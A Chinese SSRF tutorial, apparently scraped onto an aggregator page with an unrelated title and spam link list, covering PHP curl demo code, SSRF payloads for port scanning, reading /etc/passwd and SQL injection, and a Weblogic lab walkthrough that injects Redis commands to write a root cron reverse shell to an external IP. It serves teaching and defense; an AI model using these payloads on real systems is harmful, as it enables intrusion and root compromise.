当前位置: 首页 > news >正文

黑龙江营商环境建设局网站WordPress添加工单功能

黑龙江营商环境建设局网站,WordPress添加工单功能,2023最新舆情信息完整版,wordpress 3.2文章目录 渗透测试漏洞原理服务端请求伪造1. SSRF 概述1.1 SSRF 场景1.1.1 PHP 实现 1.2 SSRF 原理1.3 SSRF 危害 2. SSRF 攻防2.1 SSRF 利用2.1.1 文件访问2.1.2 端口扫描2.1.3 读取本地文件2.1.4 内网应用指纹识别2.1.5 攻击内网Web应用 2.2 SSRF 经典案例2.2.1 访问页面2.2.… 文章目录 渗透测试漏洞原理服务端请求伪造1. SSRF 概述1.1 SSRF 场景1.1.1 PHP 实现 1.2 SSRF 原理1.3 SSRF 危害 2. SSRF 攻防2.1 SSRF 利用2.1.1 文件访问2.1.2 端口扫描2.1.3 读取本地文件2.1.4 内网应用指纹识别2.1.5 攻击内网Web应用 2.2 SSRF 经典案例2.2.1 访问页面2.2.2 漏洞测试2.2.3 注入HTTP头利用Redis反弹shell 2.3 SSRF 防御2.3.1 过滤输入2.3.2 过滤输出2.3.3 内部网络隔离2.3.4 授权验证和访问控制2.3.5 安全编码实践 3. SSRF 挖掘 渗透测试漏洞原理 服务端请求伪造 1. SSRF 概述 服务器会根据用户提交的URL发送一个HTTP请求。使用用户指定的URLWeb应用可以获取图片或者文件资源等。典型的例子是百度识图功能。 如果没有对用户提交URL和远端服务器所返回的信息做合适的验证或过滤就有可能存在“请求伪造的缺陷。“请求伪造”顾名思义攻击者伪造正常的请求以达到攻击的目的。如果“请求伪造”发生在服务器端那这个漏洞就叫做“服务器端请求伪造”英文名字Server Side Request Forgery简称SSRF。 SSRF是一种由攻击者发起的伪造服务器发送的请求的一种攻击。 1.1 SSRF 场景 SSRF漏洞主要出现在需要从服务器向其他资源发送请求的应用程序中例如图片处理、文件下载、URL 转发等。其中被攻击的目标系统通常位于服务器的内部网络。 1.1.1 PHP 实现 利用curl实现需要PHP扩展组件curl支持 该实验需要开启curl ?phpif(isset($_REQUEST[url])){$link $_REQUEST[url];$fileName ./curled/.time()..txt; # 在curled目录下新建一个文件将请求到的内容放到该文件中。$curlObj curl_init($link); # 初始化$fp fopen($fileName,w);curl_setopt($curlObj,CURLOPT_FILE,$fp);curl_setopt($curlObj,CURLOPT_HEADER,0);curl_setopt($curlObj,CURLOPT_FOLLOWLOCATION,TRUE);curl_exec($curlObj);curl_close($curlObj);fclose($fp);if(getimagesize($fileName)){header(Content-Type:image/png);}$fp fopen($fileName,r);$result fread($fp,filesize($fileName));fclose($fp);echo $result;}else{echo ?url[url];} ?在phpstudy的www目录下创建一个ssrf然后在ssrf中创建一个curled目录。 在网上复制一个图片的链接https://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif 浏览器中输入 http://127.0.0.1/ssrf/ssrf_curl.php?urlhttp://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif页面效果如下 整个实验的流程ssrf_curl.php文件会接受来着客户端的URL地址然后服务器收到URL地址后根据这个URL地址发起请求把请求到的图片保存下来。 1.2 SSRF 原理 服务器接受了来自于客户端的URL 地址并由服务器发送该URL 请求。 对用户输入的URL 没有进行恰当的过滤导致任意URL 输入。 没对响应的结果进行检验直接输出。 1.3 SSRF 危害 漏洞危害 内部资产暴露攻击者可以通过伪造的请求访问内部资源包括数据库、文件系统、配置文件、读取本地文件等。敏感信息泄露攻击者可以利用该漏洞获取敏感信息例如访问受限 API、执行未经授权的操作等。进行攻击攻击者可以通过伪造的请求向其他系统发起攻击例如内网端口扫描、攻击内网应用、内网Web应用指纹识别、利用其他漏洞等。 2. SSRF 攻防 2.1 SSRF 利用 2.1.1 文件访问 ?urlhttp://www.baidu.com ?urlhttp://www.baidu.com/img/bd_logo.png ?urlhttp://www.baidu.com/robots.txt例如 2.1.2 端口扫描 ?urlhttp://127.0.0.1:80 ?urlhttp://127.0.0.1:3306 ?urldict://127.0.0.1:3306?urlhttp://10.10.10.1:22 ?urlhttp://10.10.10.1:63792.1.3 读取本地文件 ?urlfile:///c:/windows/system32/drivers/etc/hosts ?urlfile:///etc/passwd?urlfile:/c:/www/ssrf/ssrf_curl.php还可以读取ssrf_curl.php文件。 2.1.4 内网应用指纹识别 有些应用是部署在内网的。 Directory c:\phpstudy_2016\www\phpMyAdmin #Order allow,denyOrder deny,allow deny from all # 拒绝所有allow from 127.0.0.1 # 只允许本机/Directory修改httpd_config配置文件。 配置完后在内网中可以访问到phpMyAdmin 如果是外部访问的话是无法访问到的。 内网应用指纹识别。可以看到phpmyadmin版本 ?urlhttp://127.0.0.1/phpmyadmin/readme2.1.5 攻击内网Web应用 内网安全通常都很薄弱。 Directory c:\phpstudy_2016\www\cms#Order allow,deny Order deny,allow deny from allallow from 127.0.0.1/Directory通过SSRF 漏洞可以实现对内网的访问从而可以攻击内网应用。仅仅通过GET 方法可以攻击的内网Web 应用有很多。 ?urlhttp://127.0.0.1/cms/show.php? id-33/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15/**/from/**/cms_ users?urlhttp://127.0.0.1/cms/show.php? id-33%25%32%30union%25%32%30select%25%32%301,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%25%32%30from%25%32%30cms_users实验 该页面存在SQL注入漏洞。尝试进行注入 说明如果直接注入的话页面是没有反应的因为这里的参数如id联合查询等应该给show.php而现在是传递给了ssrf_curl.php。 解决方式用注释来替换掉空格 2.2 SSRF 经典案例 链接地址Weblogic SSRF 到GetShell。 启动docker环境 2.2.1 访问页面 发现404错误 这里访问http://your-ip:7001/uddiexplorer/无需登录即可查看uddiexplorer应用。 访问指定页面使用bp抓取数据包点击Search。 找到指定的数据包信息 右键发送到重发器查看发现页面报错 使用DNSLog探测该页面是否存在SSRF漏洞。 bp中修改数据包 查看DNSLog解析结果 解析成功说明该处存在SSRF漏洞。 2.2.2 漏洞测试 SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp在brupsuite下测试该漏洞。 访问一个可以访问的IP:PORT如http://127.0.0.1:80 可访问的80端口发生错误。 访问非http协议则会返回did not have a valid SOAP content-type。 修改为一个不存在的端口将会返回could not connect over HTTP to server。 通过错误的不同即可探测内网状态。 通过SSRF漏洞探测到内网中的Redis服务器docker环境的网段一般是172.*这里我检测到了172.20.0.2该IP存活。探索该IP有哪些端口处于开放状态这里探测到了Redis的6379端口开放。 对于Redis数据库有未授权访问的漏洞利用方式如下 数据库内容泄露利用Redis数据库读写文件 编写Webshell编写计划任务写ssh公钥 RCE漏洞 因为读取数据是看不到服务器响应的属于无回显状态。所以这里采用写数据的方式写Webshell的前提是对方需要开启Web服务而上面测试的时候80端口是未开放的。写ssh公钥的前提是需要对方开启SSH服务。最终采用编写计划任务的方式。 2.2.3 注入HTTP头利用Redis反弹shell 发送三条redis命令将弹shell脚本写入/etc/crontab set 1 \n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c sh -i /dev/tcp/192.168.188.185/21 01\n\n\n\n config set dir /etc/ config set dbfilename crontab saveRedis数据库命令是通过http协议进行提交的所以需要进行url编码 set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.188.185%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave注意换行符是“\r\n”也就是“%0D%0A”。 将url编码后的字符串放在ssrf的域名后面发送 GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearchoperatorhttp://172.20.0.2:6379/wuhu%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.188.185%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Awuhu HTTP/1.1 Host: localhost Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: closekali中监听21端口 修改bp中的数据包信息 点击发送数据包。 反弹成功 查看当前权限为root。 最后补充一下可进行利用的cron有如下几个地方 /etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下效果和crontab相同格式也要和/etc/crontab相同。漏洞利用这个目录可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件 2.3 SSRF 防御 2.3.1 过滤输入 限制协议仅允许 http 或 https 协议。 限制IP避免应用被用来获取内网数据攻击内网。 限制端口限制请求端口为常用端口。 2.3.2 过滤输出 过滤返回信息只要不符合要求的全部过滤。 统一错误信息让攻击无法对内网信息进行判断。 2.3.3 内部网络隔离 将服务器与内部资源隔离开并使用防火墙等措施限制对内部网络的访问。 2.3.4 授权验证和访问控制 实施严格的授权验证和访问控制机制确保仅授权用户可以访问受限资源。 2.3.5 安全编码实践 开发人员应遵循安全编码指南进行输入验证和输出编码以减少漏洞发生的可能性。 3. SSRF 挖掘 Web功能URL关键字分享转码服务在线翻译图片加载与下载图片、文章收藏功能未公开的API 实现sharewapurllinksrcsourcetargetu3gdisplaysourceURLimageURLdomain…
http://www.zqtcl.cn/news/602572/

相关文章:

  • 网站建设捌金手指专业5电商运营怎么推广一个新品
  • 医院网站建设企业走廊文化建设图片网站
  • 学网站建设培训机构公司网站建立费用
  • 阜宁网站制作服务商自学网站开发设计
  • 湖南建设监理工程网站设计类招聘网站
  • 门户网站建设的平台搭建长春专业网站建设推广
  • 网站建设宗旨怎么写网站建设公司外链怎么做
  • 绍兴市交通建设检测中心网站seo专业培训网络班
  • 设计国外网站有哪些玉环在哪里做网站
  • 设计网站思路如何写wordpress 修改登录
  • 网站开发php国外设计网站app吗
  • 智能响应式网站淳安县住房和城乡建设局网站
  • 招投标网站开发企业网站建设之后
  • 如何做好集团网站建设怎么做门淘宝网站
  • 医疗协助平台网站建设方案学生个人网页制作html报告
  • 专注于网站营销服务新浪云搭建wordpress
  • 免费自助建站代理鞍山招聘网最新招聘
  • 营销型类型网站有哪些类型php网站后台制作
  • 安全的网站制作公司百度app最新版本
  • 中小企业建站平台耐克网站建设策划方案
  • wordpress 后台加入链接后_网站显示是标签_不是链接wms智能仓储管理系统
  • 网站建设需要什么硬件和软件有哪些中考网络应用服务平台
  • 为什么网站权重会掉房地产开发网站建设
  • 大连seo整站优化酷播wordpress视频插件
  • 好的网页设计网站学编程要什么学历
  • 做网站公司电话福建城乡建设网站查询
  • 郑州做网站哪个公司好做二手市场类型的网站名字
  • 网站建设与维护里面的个人简历选择网站建设公司好
  • 济南浩辰网站建设公司怎么样wordpress 3.8 问题
  • 柳州正规网站制作公司网站ww正能量